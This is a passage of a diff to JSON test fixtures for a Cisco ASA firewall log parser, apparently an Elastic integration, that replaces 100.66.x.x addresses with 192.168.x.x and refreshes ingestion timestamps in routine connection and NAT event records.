"address": "100.66.198.27", - "ip": "100.66.198.27" + "address": "192.168.198.27", + "ip": "192.168.198.27" }, "tags": [ "preserve_original_event" 
@@ -1063,7 +1063,7 @@ "localhost" ], "ip": [ - "100.66.198.27", + "192.168.198.27", "172.31.98.44" ] }, @@ -1074,8 +1074,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164355500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994805300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1112,8 +1112,8 @@ }, "source": { "port": 80, - "address": "100.66.198.27", - "ip": "100.66.198.27" + "address": "192.168.198.27", + "ip": "192.168.198.27" }, "tags": [ "preserve_original_event" @@ -1148,7 +1148,7 @@ "localhost" ], "ip": [ - "100.66.198.27", + "192.168.198.27", "172.31.98.44" ] }, @@ -1159,8 +1159,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164363500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994811600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1197,8 +1197,8 @@ }, "source": { "port": 80, - "address": "100.66.202.211", - "ip": "100.66.202.211" + "address": "192.168.202.211", + "ip": "192.168.202.211" }, "tags": [ "preserve_original_event" 
@@ -1233,7 +1233,7 @@ "localhost" ], "ip": [ - "100.66.202.211", + "192.168.202.211", "172.31.98.44" ] }, @@ -1244,8 +1244,8 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164373200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994817800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:46.000Z", @@ -1282,8 +1282,8 @@ }, "source": { "port": 80, - "address": "100.66.124.15", - "ip": "100.66.124.15" + "address": "192.168.124.15", + "ip": "192.168.124.15" }, "tags": [ "preserve_original_event" @@ -1318,7 +1318,7 @@ "localhost" ], "ip": [ - "100.66.124.15", + "192.168.124.15", "172.31.98.44" ] }, @@ -1329,8 +1329,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164381200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994823900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -1367,8 +1367,8 @@ }, "source": { "port": 80, - "address": "100.66.124.15", - "ip": "100.66.124.15" + "address": "192.168.124.15", + "ip": "192.168.124.15" }, "tags": [ "preserve_original_event" 
@@ -1403,7 +1403,7 @@ "localhost" ], "ip": [ - "100.66.124.15", + "192.168.124.15", "172.31.98.44" ] }, @@ -1414,8 +1414,8 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164389400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994830300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:46.000Z", @@ -1452,8 +1452,8 @@ }, "source": { "port": 80, - "address": "100.66.209.247", - "ip": "100.66.209.247" + "address": "192.168.209.247", + "ip": "192.168.209.247" }, "tags": [ "preserve_original_event" @@ -1488,7 +1488,7 @@ "localhost" ], "ip": [ - "100.66.209.247", + "192.168.209.247", "172.31.98.44" ] }, @@ -1499,8 +1499,8 @@ "severity": 6, "duration": 71000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164397800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994836700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:45.000Z", @@ -1537,8 +1537,8 @@ }, "source": { "port": 80, - "address": "100.66.35.162", - "ip": "100.66.35.162" + "address": "192.168.35.162", + "ip": "192.168.35.162" }, "tags": [ "preserve_original_event" 
@@ -1573,7 +1573,7 @@ "localhost" ], "ip": [ - "100.66.35.162", + "192.168.35.162", "172.31.98.44" ] }, @@ -1584,8 +1584,8 @@ "severity": 6, "duration": 30000000000, "reason": "SYN Timeout", - "ingested": "2021-10-06T20:55:00.164421200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", + "ingested": "2021-12-09T13:33:41.994843Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:26.000Z", @@ -1617,8 +1617,8 @@ }, "destination": { "port": 1188, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -1658,7 +1658,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -1666,8 +1666,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164429300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1188", + "ingested": "2021-12-09T13:33:41.994848500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -1700,8 +1700,8 @@ }, "source": { "port": 53, - "address": "100.66.80.32", - "ip": "100.66.80.32" + "address": "192.168.80.32", + "ip": "192.168.80.32" }, "tags": [ "preserve_original_event" @@ -1736,7 +1736,7 @@ "localhost" ], "ip": [ - "100.66.80.32", + "192.168.80.32", "172.31.98.44" ] }, 
@@ -1745,8 +1745,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164437300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:100.66.80.32/53 (100.66.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.994853800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1762,7 +1762,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.80.32", + "mapped_source_ip": "192.168.80.32", "connection_id": "11758", "source_interface": "outside", "mapped_destination_port": 56132 @@ -1784,8 +1784,8 @@ }, "source": { "port": 53, - "address": "100.66.80.32", - "ip": "100.66.80.32" + "address": "192.168.80.32", + "ip": "192.168.80.32" }, "tags": [ "preserve_original_event" @@ -1820,7 +1820,7 @@ "localhost" ], "ip": [ - "100.66.80.32", + "192.168.80.32", "172.31.98.44" ] }, @@ -1830,8 +1830,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164445500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:100.66.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", + "ingested": "2021-12-09T13:33:41.994860Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -1868,8 +1868,8 @@ }, "source": { "port": 53, - "address": "100.66.252.6", - "ip": "100.66.252.6" + "address": "192.168.252.6", + "ip": "192.168.252.6" }, "tags": [ "preserve_original_event" @@ -1904,7 +1904,7 @@ "localhost" ], "ip": [ - "100.66.252.6", + "192.168.252.6", "172.31.98.44" ] }, @@ -1913,8 +1913,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164454Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:100.66.252.6/53 (100.66.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.994866400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1930,7 +1930,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.6", + "mapped_source_ip": "192.168.252.6", "connection_id": "11759", "source_interface": "outside", "mapped_destination_port": 56132 @@ -1952,8 +1952,8 @@ }, "source": { "port": 53, - "address": "100.66.252.6", - "ip": "100.66.252.6" + "address": "192.168.252.6", + "ip": "192.168.252.6" }, "tags": [ "preserve_original_event" @@ -1988,7 +1988,7 @@ "localhost" ], "ip": [ - "100.66.252.6", + "192.168.252.6", "172.31.98.44" ] }, 
@@ -1998,8 +1998,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164462500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:100.66.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", + "ingested": "2021-12-09T13:33:41.994871Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2031,8 +2031,8 @@ }, "destination": { "port": 8257, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1773, @@ -2072,7 +2072,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2080,8 +2080,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164470500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:100.66.98.44/8257", + "ingested": "2021-12-09T13:33:41.994876100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2114,8 +2114,8 @@ }, "source": { "port": 80, - "address": "100.66.252.226", - "ip": "100.66.252.226" + "address": "192.168.252.226", + "ip": "192.168.252.226" }, "tags": [ "preserve_original_event" @@ -2150,7 +2150,7 @@ "localhost" ], "ip": [ - "100.66.252.226", + "192.168.252.226", "172.31.98.44" ] }, 
@@ -2159,8 +2159,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164478400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", + "ingested": "2021-12-09T13:33:41.994882400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2176,7 +2176,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.226", + "mapped_source_ip": "192.168.252.226", "connection_id": "11760", "source_interface": "outside", "mapped_destination_port": 1773 @@ -2193,8 +2193,8 @@ }, "destination": { "port": 8258, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1774, @@ -2234,7 +2234,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2242,8 +2242,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164486400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:100.66.98.44/8258", + "ingested": "2021-12-09T13:33:41.994887500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2276,8 +2276,8 @@ }, "source": { "port": 80, - "address": "100.66.252.226", - "ip": "100.66.252.226" + "address": "192.168.252.226", + "ip": "192.168.252.226" }, "tags": [ "preserve_original_event" 
@@ -2312,7 +2312,7 @@ "localhost" ], "ip": [ - "100.66.252.226", + "192.168.252.226", "172.31.98.44" ] }, @@ -2321,8 +2321,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164494200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", + "ingested": "2021-12-09T13:33:41.994892800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2338,7 +2338,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.226", + "mapped_source_ip": "192.168.252.226", "connection_id": "11761", "source_interface": "outside", "mapped_destination_port": 1774 @@ -2360,8 +2360,8 @@ }, "source": { "port": 53, - "address": "100.66.238.126", - "ip": "100.66.238.126" + "address": "192.168.238.126", + "ip": "192.168.238.126" }, "tags": [ "preserve_original_event" @@ -2396,7 +2396,7 @@ "localhost" ], "ip": [ - "100.66.238.126", + "192.168.238.126", "172.31.98.44" ] }, @@ -2405,8 +2405,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164502400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:100.66.238.126/53 (100.66.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.994897200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", 
@@ -2422,7 +2422,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.238.126", + "mapped_source_ip": "192.168.238.126", "connection_id": "11762", "source_interface": "outside", "mapped_destination_port": 56132 @@ -2444,8 +2444,8 @@ }, "source": { "port": 53, - "address": "100.66.93.51", - "ip": "100.66.93.51" + "address": "192.168.93.51", + "ip": "192.168.93.51" }, "tags": [ "preserve_original_event" @@ -2480,7 +2480,7 @@ "localhost" ], "ip": [ - "100.66.93.51", + "192.168.93.51", "172.31.98.44" ] }, @@ -2489,8 +2489,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164510300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:100.66.93.51/53 (100.66.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.994902600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2506,7 +2506,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.93.51", + "mapped_source_ip": "192.168.93.51", "connection_id": "11763", "source_interface": "outside", "mapped_destination_port": 56132 @@ -2528,8 +2528,8 @@ }, "source": { "port": 53, - "address": "100.66.238.126", - "ip": "100.66.238.126" + "address": "192.168.238.126", + "ip": "192.168.238.126" }, "tags": [ "preserve_original_event" @@ -2564,7 +2564,7 @@ "localhost" ], "ip": [ - "100.66.238.126", + "192.168.238.126", "172.31.98.44" ] }, 
@@ -2574,8 +2574,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164518100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:100.66.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", + "ingested": "2021-12-09T13:33:41.994908800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2612,8 +2612,8 @@ }, "source": { "port": 53, - "address": "100.66.93.51", - "ip": "100.66.93.51" + "address": "192.168.93.51", + "ip": "192.168.93.51" }, "tags": [ "preserve_original_event" @@ -2648,7 +2648,7 @@ "localhost" ], "ip": [ - "100.66.93.51", + "192.168.93.51", "172.31.98.44" ] }, @@ -2658,8 +2658,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164526100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:100.66.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", + "ingested": "2021-12-09T13:33:41.994915Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2691,8 +2691,8 @@ }, "destination": { "port": 8259, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1775, @@ -2732,7 +2732,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -2740,8 +2740,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164534100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:100.66.98.44/8259", + "ingested": "2021-12-09T13:33:41.994921500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2774,8 +2774,8 @@ }, "source": { "port": 443, - "address": "100.66.225.103", - "ip": "100.66.225.103" + "address": "192.168.225.103", + "ip": "192.168.225.103" }, "tags": [ "preserve_original_event" @@ -2810,7 +2810,7 @@ "localhost" ], "ip": [ - "100.66.225.103", + "192.168.225.103", "172.31.98.44" ] }, @@ -2819,8 +2819,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164542500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:100.66.225.103/443 (100.66.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", + "ingested": "2021-12-09T13:33:41.994927800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2836,7 +2836,7 @@ "destination_interface": "inside", "mapped_source_port": 443, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.225.103", + "mapped_source_ip": "192.168.225.103", "connection_id": "11764", "source_interface": "outside", "mapped_destination_port": 1775 @@ -2853,8 +2853,8 @@ }, "destination": { "port": 1189, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, 
@@ -2894,7 +2894,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2902,8 +2902,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164550800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1189", + "ingested": "2021-12-09T13:33:41.994934400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2936,8 +2936,8 @@ }, "source": { "port": 53, - "address": "100.66.240.126", - "ip": "100.66.240.126" + "address": "192.168.240.126", + "ip": "192.168.240.126" }, "tags": [ "preserve_original_event" @@ -2972,7 +2972,7 @@ "localhost" ], "ip": [ - "100.66.240.126", + "192.168.240.126", "172.31.98.44" ] }, @@ -2981,8 +2981,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164557400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:100.66.240.126/53 (100.66.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.994940600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2998,7 +2998,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.240.126", + "mapped_source_ip": "192.168.240.126", "connection_id": "11772", "source_interface": "outside", "mapped_destination_port": 56132 
@@ -3020,8 +3020,8 @@ }, "source": { "port": 53, - "address": "100.66.44.45", - "ip": "100.66.44.45" + "address": "192.168.44.45", + "ip": "192.168.44.45" }, "tags": [ "preserve_original_event" @@ -3056,7 +3056,7 @@ "localhost" ], "ip": [ - "100.66.44.45", + "192.168.44.45", "172.31.98.44" ] }, @@ -3065,8 +3065,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164565500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:100.66.44.45/53 (100.66.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.994947700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3082,7 +3082,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.44.45", + "mapped_source_ip": "192.168.44.45", "connection_id": "11773", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3104,8 +3104,8 @@ }, "source": { "port": 53, - "address": "100.66.240.126", - "ip": "100.66.240.126" + "address": "192.168.240.126", + "ip": "192.168.240.126" }, "tags": [ "preserve_original_event" @@ -3140,7 +3140,7 @@ "localhost" ], "ip": [ - "100.66.240.126", + "192.168.240.126", "172.31.98.44" ] }, 
@@ -3150,8 +3150,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164573300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:100.66.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", + "ingested": "2021-12-09T13:33:41.994954Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3188,8 +3188,8 @@ }, "source": { "port": 53, - "address": "100.66.44.45", - "ip": "100.66.44.45" + "address": "192.168.44.45", + "ip": "192.168.44.45" }, "tags": [ "preserve_original_event" @@ -3224,7 +3224,7 @@ "localhost" ], "ip": [ - "100.66.44.45", + "192.168.44.45", "172.31.98.44" ] }, @@ -3234,8 +3234,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164581400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:100.66.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", + "ingested": "2021-12-09T13:33:41.994960800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3267,8 +3267,8 @@ }, "destination": { "port": 8265, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1452, @@ -3308,7 +3308,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
